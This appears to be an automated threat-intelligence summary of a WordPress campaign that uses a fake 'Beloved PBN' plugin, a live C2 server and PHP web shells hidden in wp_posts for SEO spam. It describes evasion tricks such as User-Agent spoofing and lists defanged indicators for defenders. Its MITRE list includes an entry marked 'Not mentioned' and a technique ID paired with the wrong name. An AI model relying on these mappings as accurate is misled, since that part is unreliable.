Researchers uncovered a multi-stage WordPress compromise involving the fake plugin “Beloved PBN Entegrasyonu,” a live command-and-control server, and two PHP web shells hidden inside the wp_posts database. The campaign, run by a Turkish-speaking threat actor, injected hidden backlinks for a Private Blog Network and used database-resident payloads and browser-spoofing tactics to evade detection. #BelovedPBNEntegrasyonu #wp_posts #wp-trackercom #destangelirvipcom
Keypoints
- The infection used three coordinated malicious components: a fake WordPress plugin, a remote C2 server, and two database-stored PHP web shells.
- The fake plugin “Beloved PBN Entegrasyonu” was installed under wp-content/plugins/beloved-pbn/beloved-pbn.php and injected attacker-controlled HTML or JavaScript into the page footer.
- The campaign focused on SEO manipulation through hidden backlink injection for a Private Blog Network, likely tied to gambling and adult affiliate monetization.
- Two PHP web shells were stored as raw executable code inside wp_posts records, giving the attacker unrestricted filesystem access without authentication.
- The malware used a Chrome 120 User-Agent spoof and referenced a FortiGuard bypass in its code to blend outbound traffic with normal browsing activity.
- The C2 server at wp-tracker[.]com/api[.]php was active during discovery and returned tailored payloads based on infected site beacons.
- The impact included search-ranking damage, potential Google Search Console penalties, credential theft, file replacement, cryptomining deployment, and lateral movement to other sites on the same server.
MITRE Techniques
- [T1505.003 ] Web Shell – The attacker stored executable PHP shells inside the WordPress database to provide persistent remote control over the server (‘two PHP web shells stored directly inside the WordPress database’ and ‘complete control of the website’).
- [T1105 ] Ingress Tool Transfer – The fake plugin contacted a remote API and received payloads to inject into pages (‘call a remote server on every page load’ and ‘returning tailored link injection payloads’).
- [T1056.001 ] Input Capture: Keylogging – Not mentioned.
- [T1036 ] Masquerading – The malware used a legitimate-looking plugin name and spoofed a Chrome 120 User-Agent to blend in (‘Beloved PBN Entegrasyonu’ and ‘explicitly commented … this was a FortiGuard bypass’).
- [T1071.001 ] Web Protocols – The plugin beaconed to an external API over HTTP/HTTPS-style web requests and used POST requests to communicate with the C2 (‘POST requests to wp-tracker[.]com/api.php’ and ‘call a remote server on every page load’).
- [T1505.004 ] Server Software Component: Application Layer Protocol – The fake WordPress plugin acted as a persistent server-side component that injected content into webpages (‘installed at ./wp-content/plugins/beloved-pbn/beloved-pbn.php’ and ‘injected whatever HTML or JavaScript the server returned directly into the page footer’).
Indicators of Compromise
- [File path ] malicious plugin location – wp-content/plugins/beloved-pbn/beloved-pbn.php, ./wp-content/plugins/beloved-pbn/beloved-pbn.php
- [Domain/URL ] command-and-control and payload delivery – wp-tracker[.]com/api[.]php, destangelirvip[.]com
- [Database table ] malicious database-resident payloads – wp_posts, records containing PHP code
- [Plugin name ] fake WordPress plugin identifier – Beloved PBN, Beloved PBN Entegrasyonu
- [HTTP indicator ] outbound beaconing and payload requests – POST requests to wp-tracker[.]com/api.php, Chrome 120 User-Agent header